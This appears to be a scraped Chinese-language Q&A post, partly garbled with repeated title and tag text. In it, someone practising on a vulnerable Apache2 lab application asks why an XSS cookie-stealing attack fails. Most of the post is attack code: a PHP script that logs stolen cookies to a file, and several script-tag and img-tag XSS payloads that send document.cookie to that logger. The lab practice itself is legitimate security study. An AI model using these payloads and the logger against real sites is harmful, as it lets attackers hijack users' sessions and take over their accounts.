Javascript 使用XSS窃取用户cookie
我正在一个易受攻击的apache2 web应用程序上练习一些XSS,在获取用户cookie信息时遇到了一些问题 我们收到一个恶意网页:Javascript 使用XSS窃取用户cookie,javascript,php,cookies,xss,Javascript,Php,Cookies,Xss,我正在一个易受攻击的apache2 web应用程序上练习一些XSS,在获取用户cookie信息时遇到了一些问题 我们收到一个恶意网页: <html> <head> <h2>This page has malicious links</h2> </head> <body> First look at this one. This link's text and the actual link behind it are dif
<html>
<head>
<h2>This page has malicious links</h2>
</head>
<body>
First look at this one. This link's text and the actual link behind it are different. You can notice that by hovering the mouse on the link and noting the actual referral location on the status bar.
<a href="#">EMC's RSA Security Breach May Cost Bank Customers $100 Million</a>
</body>
</html>
log.txt<?php
$f = fopen("log.txt","a");
$referrer = "\n".$_SERVER['HTTP_REFERER']."\n";
$cookie = "info=".$_GET['info']."\n";
fwrite($f, $referrer);
fwrite($f, $cookie);
fclose($f);
?>
<a href="<script>document.location='http://localhost/XSS/stealcookie.php?cookie='.concat(escape(document.cookie));</script>">EMC's RSA Security Breach May Cost Bank Customers $100 Million</a>
<a href="http://localhost/XSS/stealcookie.php?query=<script>document.location='http://localhost/XSS/stealcookie.php?cookie='.concat(escape(document.cookie));</script>">EMC's RSA Security Breach May Cost Bank Customers $100 Million</a>
<a href="http://localhost/XSS/stealcookie.php?info=<script>document.location='http://localhost/XSS/stealcookie.php?cookie='.concat(escape(document.cookie));</script>">EMC's RSA Security Breach May Cost Bank Customers $100 Million</a>
<script>document.write('<img src="http://localhost/stealcookie.php?cookie=' + document.cookie + '"/>')</script>